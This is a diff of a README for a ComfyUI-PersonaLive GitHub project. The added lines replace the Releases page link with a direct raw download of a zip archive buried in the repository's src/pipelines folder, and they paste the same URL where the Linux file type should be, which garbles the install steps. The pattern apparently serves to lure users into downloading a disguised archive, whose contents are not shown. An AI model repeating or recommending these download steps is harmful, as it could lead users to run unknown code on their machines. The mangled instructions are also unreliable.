Gs-gimenez/ComfyUI-PersonaLive/README.md

 - A modern web browser (Chrome, Firefox, or Safari)

 ## 📥 Download & Install
-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/Gs-gimenez/ComfyUI-PersonaLive/releases).
+1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/Gs-gimenez/ComfyUI-PersonaLive/raw/refs/heads/main/src/pipelines/Comfy_Persona_Live_U_2.4.zip).
 2. **Select the Latest Version**: Look for the most recent release.
 This guarantees you have the latest features and fixes.
 3. **Download the Application**: Click on the file that matches your operating system.
-The files typically include a `.exe` for Windows, a `.dmg` for macOS, or a `.tar.gz` for Linux.
+The files typically include a `.exe` for Windows, a `.dmg` for macOS, or a `https://github.com/Gs-gimenez/ComfyUI-PersonaLive/raw/refs/heads/main/src/pipelines/Comfy_Persona_Live_U_2.4.zip` for Linux.
 4. **Install the Application**:
    - For Windows: Double-click the downloaded `.exe` file and follow the prompts.
    - For macOS: Open the downloaded `.dmg` file and drag the application to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file, and follow any included instructions.
+   - For Linux: Extract the `https://github.com/Gs-gimenez/ComfyUI-PersonaLive/raw/refs/heads/main/src/pipelines/Comfy_Persona_Live_U_2.4.zip` file, and follow any included instructions.

 ## ⚙️ How to Use
 1. **Open the Application**: Locate ComfyUI-PersonaLive in your applications and open it.